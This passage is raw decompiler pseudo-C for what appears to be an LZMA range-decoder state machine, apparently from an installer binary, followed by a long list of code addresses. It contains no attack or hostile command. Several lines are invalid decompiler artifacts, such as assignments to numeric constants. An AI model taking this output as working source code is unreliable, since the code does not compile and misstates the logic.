                                                                        							__edx = __ax & 0x0000ffff;
                                                                        							__ecx = (_v20 >> 0xb) * __edx;
                                                                        							__eflags = _v16 - __ecx;
                                                                        							if(_v16 >= __ecx) {
                                                                        								_v20 = _v20 - __ecx;
                                                                        								_v16 = _v16 - __ecx;
                                                                        								__cx = __ax;
                                                                        								_v68 = 1;
                                                                        								__cx = __ax >> 5;
                                                                        								__eflags = __eax;
                                                                        								__ebx = __ebx + __ebx + 1;
                                                                        								 *__esi = __ax;
                                                                        							} else {
                                                                        								_v68 = _v68 & 0x00000000;
                                                                        								_v20 = __ecx;
                                                                        								0x800 = 0x800 - __edx;
                                                                        								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                                                                        								__ebx = __ebx + __ebx;
                                                                        								 *__esi = __cx;
                                                                        							}
                                                                        							__eflags = _v20 - 0x1000000;
                                                                        							_v72 = __ebx;
                                                                        							if(_v20 >= 0x1000000) {
                                                                        								goto L41;
                                                                        							} else {
                                                                        								goto L39;
                                                                        							}
                                                                        						case 0xe:
                                                                        							L48:
                                                                        							__eflags = _v112;
                                                                        							if(_v112 == 0) {
                                                                        								_v140 = 0xe;
                                                                        								goto L173;
                                                                        							}
                                                                        							__ecx = _v116;
                                                                        							__eax = _v16;
                                                                        							_v20 = _v20 << 8;
                                                                        							__ecx =  *_v116 & 0x000000ff;
                                                                        							_v112 = _v112 - 1;
                                                                        							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                                        							_t161 =  &_v116;
                                                                        							 *_t161 = _v116 + 1;
                                                                        							__eflags =  *_t161;
                                                                        							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                                        							while(1) {
                                                                        								L50:
                                                                        								__eflags = __ebx - 0x100;
                                                                        								if(__ebx >= 0x100) {
                                                                        									break;
                                                                        								}
                                                                        								__eax = _v92;
                                                                        								__edx = __ebx + __ebx;
                                                                        								__ecx = _v20;
                                                                        								__esi = __edx + __eax;
                                                                        								__ecx = _v20 >> 0xb;
                                                                        								__ax =  *__esi;
                                                                        								_v88 = __esi;
                                                                        								__edi = __ax & 0x0000ffff;
                                                                        								__ecx = (_v20 >> 0xb) * __edi;
                                                                        								__eflags = _v16 - __ecx;
                                                                        								if(_v16 >= __ecx) {
                                                                        									_v20 = _v20 - __ecx;
                                                                        									_v16 = _v16 - __ecx;
                                                                        									__cx = __ax;
                                                                        									_t175 = __edx + 1; // 0x1
                                                                        									__ebx = _t175;
                                                                        									__cx = __ax >> 5;
                                                                        									__eflags = __eax;
                                                                        									 *__esi = __ax;
                                                                        								} else {
                                                                        									_v20 = __ecx;
                                                                        									0x800 = 0x800 - __edi;
                                                                        									0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                                        									__ebx = __ebx + __ebx;
                                                                        									 *__esi = __cx;
                                                                        								}
                                                                        								__eflags = _v20 - 0x1000000;
                                                                        								_v72 = __ebx;
                                                                        								if(_v20 >= 0x1000000) {
                                                                        									continue;
                                                                        								} else {
                                                                        									goto L48;
                                                                        								}
                                                                        							}
                                                                        							L56:
                                                                        							_t178 =  &_v56;
                                                                        							 *_t178 = _v56 & 0x00000000;
                                                                        							__eflags =  *_t178;
                                                                        							goto L57;
                                                                        						case 0xf:
                                                                        							L60:
                                                                        							__eflags = _v112;
                                                                        							if(_v112 == 0) {
                                                                        								_v140 = 0xf;
                                                                        								goto L173;
                                                                        							}
                                                                        							__ecx = _v116;
                                                                        							__eax = _v16;
                                                                        							_v20 = _v20 << 8;
                                                                        							__ecx =  *_v116 & 0x000000ff;
                                                                        							_v112 = _v112 - 1;
                                                                        							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                                        							_t208 =  &_v116;
                                                                        							 *_t208 = _v116 + 1;
                                                                        							__eflags =  *_t208;
                                                                        							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                                        							L62:
                                                                        							__eflags = __ebx - 0x100;
                                                                        							if(__ebx >= 0x100) {
                                                                        								L57:
                                                                        								__al = _v72;
                                                                        								_v96 = _v72;
                                                                        								goto L58;
                                                                        							}
                                                                        							L63:
                                                                        							__eax = _v92;
                                                                        							__edx = __ebx + __ebx;
                                                                        							__ecx = _v20;
                                                                        							__esi = __edx + __eax;
                                                                        							__ecx = _v20 >> 0xb;
                                                                        							__ax =  *__esi;
                                                                        							_v88 = __esi;
                                                                        							__edi = __ax & 0x0000ffff;
                                                                        							__ecx = (_v20 >> 0xb) * __edi;
                                                                        							__eflags = _v16 - __ecx;
                                                                        							if(_v16 >= __ecx) {
                                                                        								_v20 = _v20 - __ecx;
                                                                        								_v16 = _v16 - __ecx;
                                                                        								__cx = __ax;
                                                                        								_t222 = __edx + 1; // 0x1
                                                                        								__ebx = _t222;
                                                                        								__cx = __ax >> 5;
                                                                        								__eflags = __eax;
                                                                        								 *__esi = __ax;
                                                                        							} else {
                                                                        								_v20 = __ecx;
                                                                        								0x800 = 0x800 - __edi;
                                                                        								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                                        								__ebx = __ebx + __ebx;
                                                                        								 *__esi = __cx;
                                                                        							}
                                                                        							__eflags = _v20 - 0x1000000;
                                                                        							_v72 = __ebx;
                                                                        							if(_v20 >= 0x1000000) {
                                                                        								goto L62;
                                                                        							} else {
                                                                        								goto L60;
                                                                        							}
                                                                        						case 0x10:
                                                                        							L112:
                                                                        							__eflags = _v112;
                                                                        							if(_v112 == 0) {
                                                                        								_v140 = 0x10;
                                                                        								goto L173;
                                                                        							}
                                                                        							__ecx = _v116;
                                                                        							__eax = _v16;
                                                                        							_v20 = _v20 << 8;
                                                                        							__ecx =  *_v116 & 0x000000ff;
                                                                        							_v112 = _v112 - 1;
                                                                        							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                                        							_t371 =  &_v116;
                                                                        							 *_t371 = _v116 + 1;
                                                                        							__eflags =  *_t371;
                                                                        							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                                        							goto L114;
                                                                        						case 0x11:
                                                                        							L71:
                                                                        							__esi = _v92;
                                                                        							_v136 = 0x12;
                                                                        							goto L135;
                                                                        						case 0x12:
                                                                        							__eflags = _v68;
                                                                        							if(_v68 != 0) {
                                                                        								__eax = _v92;
                                                                        								_v136 = 0x13;
                                                                        								__esi = _v92 + 2;
                                                                        								L135:
                                                                        								_v88 = _t626;
                                                                        								goto L136;
                                                                        							}
                                                                        							__eax = _v80;
                                                                        							_v52 = _v52 & 0x00000000;
                                                                        							__ecx = _v92;
                                                                        							__eax = _v80 << 4;
                                                                        							__eflags = __eax;
                                                                        							__eax = _v92 + __eax + 4;
                                                                        							goto L133;
                                                                        						case 0x13:
                                                                        							__eflags = _v68;
                                                                        							if(_v68 != 0) {
                                                                        								_t475 =  &_v92;
                                                                        								 *_t475 = _v92 + 0x204;
                                                                        								__eflags =  *_t475;
                                                                        								_v52 = 0x10;
                                                                        								_v68 = 8;
                                                                        								L147:
                                                                        								_v128 = 0x14;
                                                                        								goto L148;
                                                                        							}
                                                                        							__eax = _v80;
                                                                        							__ecx = _v92;
                                                                        							__eax = _v80 << 4;
                                                                        							_v52 = 8;
                                                                        							__eax = _v92 + (_v80 << 4) + 0x104;
                                                                        							L133:
                                                                        							_v92 = __eax;
                                                                        							_v68 = 3;
                                                                        							goto L147;
                                                                        						case 0x14:
                                                                        							_v52 = _v52 + __ebx;
                                                                        							__eax = _v132;
                                                                        							goto L143;
                                                                        						case 0x15:
                                                                        							__eax = 0;
                                                                        							__eflags = _v60 - 7;
                                                                        							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                                        							__al = __al & 0x000000fd;
                                                                        							__eax = (__eflags >= 0) - 1 + 0xb;
                                                                        							_v60 = (__eflags >= 0) - 1 + 0xb;
                                                                        							goto L123;
                                                                        						case 0x16:
                                                                        							__eax = _v52;
                                                                        							__eflags = __eax - 4;
                                                                        							if(__eax >= 4) {
                                                                        								_push(3);
                                                                        								_pop(__eax);
                                                                        							}
                                                                        							__ecx = _v8;
                                                                        							_v68 = 6;
                                                                        							__eax = __eax << 7;
                                                                        							_v128 = 0x19;
                                                                        							_v92 = __eax;
                                                                        							goto L148;
                                                                        						case 0x17:
                                                                        							L148:
                                                                        							__eax = _v68;
                                                                        							_v84 = 1;
                                                                        							_v76 = _v68;
                                                                        							goto L152;
                                                                        						case 0x18:
                                                                        							L149:
                                                                        							__eflags = _v112;
                                                                        							if(_v112 == 0) {
                                                                        								_v140 = 0x18;
                                                                        								goto L173;
                                                                        							}
                                                                        							__ecx = _v116;
                                                                        							__eax = _v16;
                                                                        							_v20 = _v20 << 8;
                                                                        							__ecx =  *_v116 & 0x000000ff;
                                                                        							_v112 = _v112 - 1;
                                                                        							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                                        							_t490 =  &_v116;
                                                                        							 *_t490 = _v116 + 1;
                                                                        							__eflags =  *_t490;
                                                                        							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                                        							L151:
                                                                        							_t493 =  &_v76;
                                                                        							 *_t493 = _v76 - 1;
                                                                        							__eflags =  *_t493;
                                                                        							L152:
                                                                        							__eflags = _v76;
                                                                        							if(_v76 <= 0) {
                                                                        								__ecx = _v68;
                                                                        								__ebx = _v84;
                                                                        								0 = 1;
                                                                        								__eax = 1 << __cl;
                                                                        								__ebx = _v84 - (1 << __cl);
                                                                        								__eax = _v128;
                                                                        								_v72 = __ebx;
                                                                        								L143:
                                                                        								_v140 = _t561;
                                                                        								goto L3;
                                                                        							}
                                                                        							__eax = _v84;
                                                                        							_v20 = _v20 >> 0xb;
                                                                        							__edx = _v84 + _v84;
                                                                        							__eax = _v92;
                                                                        							__esi = __edx + __eax;
                                                                        							_v88 = __esi;
                                                                        							__ax =  *__esi;
                                                                        							__edi = __ax & 0x0000ffff;
                                                                        							__ecx = (_v20 >> 0xb) * __edi;
                                                                        							__eflags = _v16 - __ecx;
                                                                        							if(_v16 >= __ecx) {
                                                                        								_v20 = _v20 - __ecx;
                                                                        								_v16 = _v16 - __ecx;
                                                                        								__cx = __ax;
                                                                        								__cx = __ax >> 5;
                                                                        								__eax = __eax - __ecx;
                                                                        								__edx = __edx + 1;
                                                                        								__eflags = __edx;
                                                                        								 *__esi = __ax;
                                                                        								_v84 = __edx;
                                                                        							} else {
                                                                        								_v20 = __ecx;
                                                                        								0x800 = 0x800 - __edi;
                                                                        								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                                        								_v84 = _v84 << 1;
                                                                        								 *__esi = __cx;
                                                                        							}
                                                                        							__eflags = _v20 - 0x1000000;
                                                                        							if(_v20 >= 0x1000000) {
                                                                        								goto L151;
                                                                        							} else {
                                                                        								goto L149;
                                                                        							}
                                                                        						case 0x19:
                                                                        							__eflags = __ebx - 4;
                                                                        							if(__ebx < 4) {
                                                                        								_v48 = __ebx;
                                                                        								L122:
                                                                        								_t399 =  &_v48;
                                                                        								 *_t399 = _v48 + 1;
                                                                        								__eflags =  *_t399;
                                                                        								L123:
                                                                        								__eax = _v48;
                                                                        								__eflags = __eax;
                                                                        								if(__eax == 0) {
                                                                        									_v52 = _v52 | 0xffffffff;
                                                                        									goto L173;
                                                                        								}
                                                                        								__eflags = __eax - _v100;
                                                                        								if(__eax > _v100) {
                                                                        									goto L174;
                                                                        								}
                                                                        								_v52 = _v52 + 2;
                                                                        								__eax = _v52;
                                                                        								_t406 =  &_v100;
                                                                        								 *_t406 = _v100 + _v52;
                                                                        								__eflags =  *_t406;
                                                                        								goto L126;
                                                                        							}
                                                                        							__ecx = __ebx;
                                                                        							__eax = __ebx;
                                                                        							__ecx = __ebx >> 1;
                                                                        							__eax = __ebx & 0x00000001;
                                                                        							__ecx = (__ebx >> 1) - 1;
                                                                        							__al = __al | 0x00000002;
                                                                        							__eax = (__ebx & 0x00000001) << __cl;
                                                                        							__eflags = __ebx - 0xe;
                                                                        							_v48 = __eax;
                                                                        							if(__ebx >= 0xe) {
                                                                        								__ebx = 0;
                                                                        								_v76 = __ecx;
                                                                        								L105:
                                                                        								__eflags = _v76;
                                                                        								if(_v76 <= 0) {
                                                                        									__eax = __eax + __ebx;
                                                                        									_v68 = 4;
                                                                        									_v48 = __eax;
                                                                        									__eax = _v8;
                                                                        									__eax = _v8 + 0x644;
                                                                        									__eflags = __eax;
                                                                        									L111:
                                                                        									__ebx = 0;
                                                                        									_v92 = __eax;
                                                                        									_v84 = 1;
                                                                        									_v72 = 0;
                                                                        									_v76 = 0;
                                                                        									L115:
                                                                        									__eax = _v68;
                                                                        									__eflags = _v76 - _v68;
                                                                        									if(_v76 >= _v68) {
                                                                        										_t397 =  &_v48;
                                                                        										 *_t397 = _v48 + __ebx;
                                                                        										__eflags =  *_t397;
                                                                        										goto L122;
                                                                        									}
                                                                        									__eax = _v84;
                                                                        									_v20 = _v20 >> 0xb;
                                                                        									__edi = _v84 + _v84;
                                                                        									__eax = _v92;
                                                                        									__esi = __edi + __eax;
                                                                        									_v88 = __esi;
                                                                        									__ax =  *__esi;
                                                                        									__ecx = __ax & 0x0000ffff;
                                                                        									__edx = (_v20 >> 0xb) * __ecx;
                                                                        									__eflags = _v16 - __edx;
                                                                        									if(_v16 >= __edx) {
                                                                        										__ecx = 0;
                                                                        										_v20 = _v20 - __edx;
                                                                        										__ecx = 1;
                                                                        										_v16 = _v16 - __edx;
                                                                        										__ebx = 1;
                                                                        										__ecx = _v76;
                                                                        										__ebx = 1 << __cl;
                                                                        										__ecx = 1 << __cl;
                                                                        										__ebx = _v72;
                                                                        										__ebx = _v72 | __ecx;
                                                                        										__cx = __ax;
                                                                        										__cx = __ax >> 5;
                                                                        										__eax = __eax - __ecx;
                                                                        										__edi = __edi + 1;
                                                                        										__eflags = __edi;
                                                                        										_v72 = __ebx;
                                                                        										 *__esi = __ax;
                                                                        										_v84 = __edi;
                                                                        									} else {
                                                                        										_v20 = __edx;
                                                                        										0x800 = 0x800 - __ecx;
                                                                        										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
                                                                        										_v84 = _v84 << 1;
                                                                        										 *__esi = __dx;
                                                                        									}
                                                                        									__eflags = _v20 - 0x1000000;
                                                                        									if(_v20 >= 0x1000000) {
                                                                        										L114:
                                                                        										_t374 =  &_v76;
                                                                        										 *_t374 = _v76 + 1;
                                                                        										__eflags =  *_t374;
                                                                        										goto L115;
                                                                        									} else {
                                                                        										goto L112;
                                                                        									}
                                                                        								}
                                                                        								__ecx = _v16;
                                                                        								__ebx = __ebx + __ebx;
                                                                        								_v20 = _v20 >> 1;
                                                                        								__eflags = _v16 - _v20;
                                                                        								_v72 = __ebx;
                                                                        								if(_v16 >= _v20) {
                                                                        									__ecx = _v20;
                                                                        									_v16 = _v16 - _v20;
                                                                        									__ebx = __ebx | 0x00000001;
                                                                        									__eflags = __ebx;
                                                                        									_v72 = __ebx;
                                                                        								}
                                                                        								__eflags = _v20 - 0x1000000;
                                                                        								if(_v20 >= 0x1000000) {
                                                                        									L104:
                                                                        									_t344 =  &_v76;
                                                                        									 *_t344 = _v76 - 1;
                                                                        									__eflags =  *_t344;
                                                                        									goto L105;
                                                                        								} else {
                                                                        									goto L102;
                                                                        								}
                                                                        							}
                                                                        							__edx = _v8;
                                                                        							__eax = __eax - __ebx;
                                                                        							_v68 = __ecx;
                                                                        							__eax = _v8 + 0x55e + __eax * 2;
                                                                        							goto L111;
                                                                        						case 0x1a:
                                                                        							L58:
                                                                        							__eflags = _v104;
                                                                        							if(_v104 == 0) {
                                                                        								_v140 = 0x1a;
                                                                        								goto L173;
                                                                        							}
                                                                        							__ecx = _v108;
                                                                        							__al = _v96;
                                                                        							__edx = _v12;
                                                                        							_v100 = _v100 + 1;
                                                                        							_v108 = _v108 + 1;
                                                                        							_v104 = _v104 - 1;
                                                                        							 *_v108 = __al;
                                                                        							__ecx = _v24;
                                                                        							 *(_v12 + __ecx) = __al;
                                                                        							__eax = __ecx + 1;
                                                                        							__edx = 0;
                                                                        							_t197 = __eax % _v120;
                                                                        							__eax = __eax / _v120;
                                                                        							__edx = _t197;
                                                                        							goto L82;
                                                                        						case 0x1b:
                                                                        							L78:
                                                                        							__eflags = _v104;
                                                                        							if(_v104 == 0) {
                                                                        								_v140 = 0x1b;
                                                                        								goto L173;
                                                                        							}
                                                                        							__eax = _v24;
                                                                        							__eax = _v24 - _v48;
                                                                        							__eflags = __eax - _v120;
                                                                        							if(__eax >= _v120) {
                                                                        								__eax = __eax + _v120;
                                                                        								__eflags = __eax;
                                                                        							}
                                                                        							__edx = _v12;
                                                                        							__cl =  *(__edx + __eax);
                                                                        							__eax = _v24;
                                                                        							_v96 = __cl;
                                                                        							 *(__edx + __eax) = __cl;
                                                                        							__eax = __eax + 1;
                                                                        							__edx = 0;
                                                                        							_t280 = __eax % _v120;
                                                                        							__eax = __eax / _v120;
                                                                        							__edx = _t280;
                                                                        							__eax = _v108;
                                                                        							_v100 = _v100 + 1;
                                                                        							_v108 = _v108 + 1;
                                                                        							_t289 =  &_v104;
                                                                        							 *_t289 = _v104 - 1;
                                                                        							__eflags =  *_t289;
                                                                        							 *_v108 = __cl;
                                                                        							L82:
                                                                        							_v24 = __edx;
                                                                        							goto L83;
                                                                        						case 0x1c:
                                                                        							while(1) {
                                                                        								L126:
                                                                        								__eflags = _v104;
                                                                        								if(_v104 == 0) {
                                                                        									break;
                                                                        								}
                                                                        								__eax = _v24;
                                                                        								__eax = _v24 - _v48;
                                                                        								__eflags = __eax - _v120;
                                                                        								if(__eax >= _v120) {
                                                                        									__eax = __eax + _v120;
                                                                        									__eflags = __eax;
                                                                        								}
                                                                        								__edx = _v12;
                                                                        								__cl =  *(__edx + __eax);
                                                                        								__eax = _v24;
                                                                        								_v96 = __cl;
                                                                        								 *(__edx + __eax) = __cl;
                                                                        								__eax = __eax + 1;
                                                                        								__edx = 0;
                                                                        								_t420 = __eax % _v120;
                                                                        								__eax = __eax / _v120;
                                                                        								__edx = _t420;
                                                                        								__eax = _v108;
                                                                        								_v108 = _v108 + 1;
                                                                        								_v104 = _v104 - 1;
                                                                        								_v52 = _v52 - 1;
                                                                        								__eflags = _v52;
                                                                        								 *_v108 = __cl;
                                                                        								_v24 = _t420;
                                                                        								if(_v52 > 0) {
                                                                        									continue;
                                                                        								} else {
                                                                        									L83:
                                                                        									_v140 = 2;
                                                                        									goto L3;
                                                                        								}
                                                                        							}
                                                                        							_v140 = 0x1c;
                                                                        							L173:
                                                                        							_push(0x22);
                                                                        							_pop(_t574);
                                                                        							memcpy(_v148,  &_v140, _t574 << 2);
                                                                        							return 0;
                                                                        					}
                                                                        				}
                                                                        				L174:
                                                                        				_t538 = _t537 | 0xffffffff;
                                                                        				return _t538;
                                                                        			}










































                                                                        0x00406bc0
                                                                        0x00406bc7
                                                                        0x00406bcd
                                                                        0x00406bd3
                                                                        0x00000000
                                                                        0x00406bd7
                                                                        0x00406be3
                                                                        0x00406be3
                                                                        0x00406be3
                                                                        0x00406bec
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00406bf2
                                                                        0x00000000
                                                                        0x00406bf9
                                                                        0x00406bfd
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00406c06
                                                                        0x00406c09
                                                                        0x00406c0c
                                                                        0x00406c0e
                                                                        0x00406c10
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00406c16
                                                                        0x00406c19
                                                                        0x00406c1b
                                                                        0x00406c1c
                                                                        0x00406c1f
                                                                        0x00406c21
                                                                        0x00406c22
                                                                        0x00406c24
                                                                        0x00406c27
                                                                        0x00406c2c
                                                                        0x00406c31
                                                                        0x00406c3a
                                                                        0x00406c4d
                                                                        0x00406c50
                                                                        0x00406c59
                                                                        0x00406c5c
                                                                        0x00406c84
                                                                        0x00406c84
                                                                        0x00406c86
                                                                        0x00406c94
                                                                        0x00406c94
                                                                        0x00406c98
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00406c88
                                                                        0x00406c88
                                                                        0x00406c8b
                                                                        0x00406c8b
                                                                        0x00406c8c
                                                                        0x00406c8c
                                                                        0x00000000
                                                                        0x00406c88
                                                                        0x00406c5e
                                                                        0x00406c62
                                                                        0x00406c67
                                                                        0x00406c67
                                                                        0x00406c70
                                                                        0x00406c76
                                                                        0x00406c78
                                                                        0x00406c7b
                                                                        0x00000000
                                                                        0x00406c81
                                                                        0x00406c81
                                                                        0x00000000
                                                                        0x00406c81
                                                                        0x00000000
                                                                        0x00406c9e
                                                                        0x00406c9e
                                                                        0x00406ca2
                                                                        0x0040754e
                                                                        0x00000000
                                                                        0x0040754e
                                                                        0x00406cab
                                                                        0x00406cbb
                                                                        0x00406cbe
                                                                        0x00406cc1
                                                                        0x00406cc1
                                                                        0x00406cc1
                                                                        0x00406cc4
                                                                        0x00406cc4
                                                                        0x00406cc8
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00406cca
                                                                        0x00406ccd
                                                                        0x00406cd0
                                                                        0x00406cfa
                                                                        0x00406d00
                                                                        0x00406d07
                                                                        0x00000000
                                                                        0x00406d07
                                                                        0x00406cd2
                                                                        0x00406cd6
                                                                        0x00406cd9
                                                                        0x00406cde
                                                                        0x00406cde
                                                                        0x00406ce9
                                                                        0x00406cef
                                                                        0x00406cf1
                                                                        0x00406cf4
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00406d39
                                                                        0x00406d3f
                                                                        0x00406d42
                                                                        0x00406d4f
                                                                        0x00406d57
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00406d0e
                                                                        0x00406d0e
                                                                        0x00406d12
                                                                        0x0040755d
                                                                        0x00000000
                                                                        0x0040755d
                                                                        0x00406d1e
                                                                        0x00406d29
                                                                        0x00406d29
                                                                        0x00406d29
                                                                        0x00406d2c
                                                                        0x00406d2f
                                                                        0x00406d32
                                                                        0x00406d35
                                                                        0x00406d37
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x004073ce
                                                                        0x004073ce
                                                                        0x004073d4
                                                                        0x004073da
                                                                        0x004073dd
                                                                        0x004073e0
                                                                        0x004073fa
                                                                        0x004073fd
                                                                        0x00407403
                                                                        0x0040740e
                                                                        0x0040740e
                                                                        0x00407410
                                                                        0x004073e2
                                                                        0x004073e2
                                                                        0x004073f1
                                                                        0x004073f5
                                                                        0x004073f5
                                                                        0x00407413
                                                                        0x0040741a
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0040741c
                                                                        0x0040741c
                                                                        0x00407420
                                                                        0x004075cf
                                                                        0x00000000
                                                                        0x004075cf
                                                                        0x0040742c
                                                                        0x00407433
                                                                        0x0040743b
                                                                        0x0040743b
                                                                        0x0040743b
                                                                        0x0040743e
                                                                        0x00407441
                                                                        0x00407441
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00406d5f
                                                                        0x00406d61
                                                                        0x00406d64
                                                                        0x00406dd5
                                                                        0x00406dd8
                                                                        0x00406ddb
                                                                        0x00406de2
                                                                        0x00406dec
                                                                        0x00000000
                                                                        0x00406dec
                                                                        0x00406d66
                                                                        0x00406d6a
                                                                        0x00406d6d
                                                                        0x00406d6f
                                                                        0x00406d72
                                                                        0x00406d75
                                                                        0x00406d77
                                                                        0x00406d7a
                                                                        0x00406d7c
                                                                        0x00406d81
                                                                        0x00406d84
                                                                        0x00406d87
                                                                        0x00406d8b
                                                                        0x00406d92
                                                                        0x00406d95
                                                                        0x00406d9c
                                                                        0x00406da0
                                                                        0x00406da8
                                                                        0x00406da8
                                                                        0x00406da8
                                                                        0x00406da2
                                                                        0x00406da2
                                                                        0x00406da2
                                                                        0x00406d97
                                                                        0x00406d97
                                                                        0x00406d97
                                                                        0x00406dac
                                                                        0x00406daf
                                                                        0x00406dcd
                                                                        0x00406dcf
                                                                        0x00000000
                                                                        0x00406dcf
                                                                        0x00406db1
                                                                        0x00406db4
                                                                        0x00406db7
                                                                        0x00406dba
                                                                        0x00406dbc
                                                                        0x00406dbc
                                                                        0x00406dbc
                                                                        0x00406dbf
                                                                        0x00406dc2
                                                                        0x00406dc4
                                                                        0x00406dc5
                                                                        0x00406dc8
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00406ffe
                                                                        0x00407002
                                                                        0x00407020
                                                                        0x00407023
                                                                        0x0040702a
                                                                        0x0040702d
                                                                        0x00407030
                                                                        0x00407033
                                                                        0x00407036
                                                                        0x00407039
                                                                        0x0040703b
                                                                        0x00407042
                                                                        0x00407043
                                                                        0x00407045
                                                                        0x00407048
                                                                        0x0040704b
                                                                        0x0040704e
                                                                        0x0040704e
                                                                        0x00407053
                                                                        0x00000000
                                                                        0x00407053
                                                                        0x00407004
                                                                        0x00407007
                                                                        0x0040700a
                                                                        0x00407014
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00407068
                                                                        0x0040706c
                                                                        0x0040708f
                                                                        0x00407092
                                                                        0x00407095
                                                                        0x0040709f
                                                                        0x0040706e
                                                                        0x0040706e
                                                                        0x00407071
                                                                        0x00407074
                                                                        0x00407077
                                                                        0x00407084
                                                                        0x00407087
                                                                        0x00407087
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x004070ab
                                                                        0x004070af
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x004070b5
                                                                        0x004070b9
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x004070bf
                                                                        0x004070c1
                                                                        0x004070c5
                                                                        0x004070c5
                                                                        0x004070c8
                                                                        0x004070cc
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0040711c
                                                                        0x00407120
                                                                        0x00407127
                                                                        0x0040712a
                                                                        0x0040712d
                                                                        0x00407137
                                                                        0x00000000
                                                                        0x00407137
                                                                        0x00407122
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00407143
                                                                        0x00407147
                                                                        0x0040714e
                                                                        0x00407151
                                                                        0x00407154
                                                                        0x00407149
                                                                        0x00407149
                                                                        0x00407149
                                                                        0x00407157
                                                                        0x0040715a
                                                                        0x0040715d
                                                                        0x0040715d
                                                                        0x00407160
                                                                        0x00407163
                                                                        0x00407166
                                                                        0x00407166
                                                                        0x00407169
                                                                        0x00407170
                                                                        0x00407175
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00407203
                                                                        0x00407203
                                                                        0x00407207
                                                                        0x004075a5
                                                                        0x00000000
                                                                        0x004075a5
                                                                        0x0040720d
                                                                        0x00407210
                                                                        0x00407213
                                                                        0x00407217
                                                                        0x0040721a
                                                                        0x00407220
                                                                        0x00407222
                                                                        0x00407222
                                                                        0x00407222
                                                                        0x00407225
                                                                        0x00407228
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00406df8
                                                                        0x00406df8
                                                                        0x00406dfc
                                                                        0x00407569
                                                                        0x00000000
                                                                        0x00407569
                                                                        0x00406e02
                                                                        0x00406e05
                                                                        0x00406e08
                                                                        0x00406e0c
                                                                        0x00406e0f
                                                                        0x00406e15
                                                                        0x00406e17
                                                                        0x00406e17
                                                                        0x00406e17
                                                                        0x00406e1a
                                                                        0x00406e1d
                                                                        0x00406e1d
                                                                        0x00406e20
                                                                        0x00406e23
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00406e29
                                                                        0x00406e2f
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00406e35
                                                                        0x00406e35
                                                                        0x00406e39
                                                                        0x00406e3c
                                                                        0x00406e3f
                                                                        0x00406e42
                                                                        0x00406e45
                                                                        0x00406e46
                                                                        0x00406e49
                                                                        0x00406e4b
                                                                        0x00406e51
                                                                        0x00406e54
                                                                        0x00406e57
                                                                        0x00406e5a
                                                                        0x00406e5d
                                                                        0x00406e60
                                                                        0x00406e63
                                                                        0x00406e7f
                                                                        0x00406e82
                                                                        0x00406e85
                                                                        0x00406e88
                                                                        0x00406e8f
                                                                        0x00406e93
                                                                        0x00406e95
                                                                        0x00406e99
                                                                        0x00406e65
                                                                        0x00406e65
                                                                        0x00406e69
                                                                        0x00406e71
                                                                        0x00406e76
                                                                        0x00406e78
                                                                        0x00406e7a
                                                                        0x00406e7a
                                                                        0x00406e9c
                                                                        0x00406ea3
                                                                        0x00406ea6
                                                                        0x00000000
                                                                        0x00406eac
                                                                        0x00000000
                                                                        0x00406eac
                                                                        0x00000000
                                                                        0x00406eb1
                                                                        0x00406eb1
                                                                        0x00406eb5
                                                                        0x00407575
                                                                        0x00000000
                                                                        0x00407575
                                                                        0x00406ebb
                                                                        0x00406ebe
                                                                        0x00406ec1
                                                                        0x00406ec5
                                                                        0x00406ec8
                                                                        0x00406ece
                                                                        0x00406ed0
                                                                        0x00406ed0
                                                                        0x00406ed0
                                                                        0x00406ed3
                                                                        0x00406ed6
                                                                        0x00406ed6
                                                                        0x00406ed6
                                                                        0x00406edc
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00406ede
                                                                        0x00406ee1
                                                                        0x00406ee4
                                                                        0x00406ee7
                                                                        0x00406eea
                                                                        0x00406eed
                                                                        0x00406ef0
                                                                        0x00406ef3
                                                                        0x00406ef6
                                                                        0x00406ef9
                                                                        0x00406efc
                                                                        0x00406f14
                                                                        0x00406f17
                                                                        0x00406f1a
                                                                        0x00406f1d
                                                                        0x00406f1d
                                                                        0x00406f20
                                                                        0x00406f24
                                                                        0x00406f26
                                                                        0x00406efe
                                                                        0x00406efe
                                                                        0x00406f06
                                                                        0x00406f0b
                                                                        0x00406f0d
                                                                        0x00406f0f
                                                                        0x00406f0f
                                                                        0x00406f29
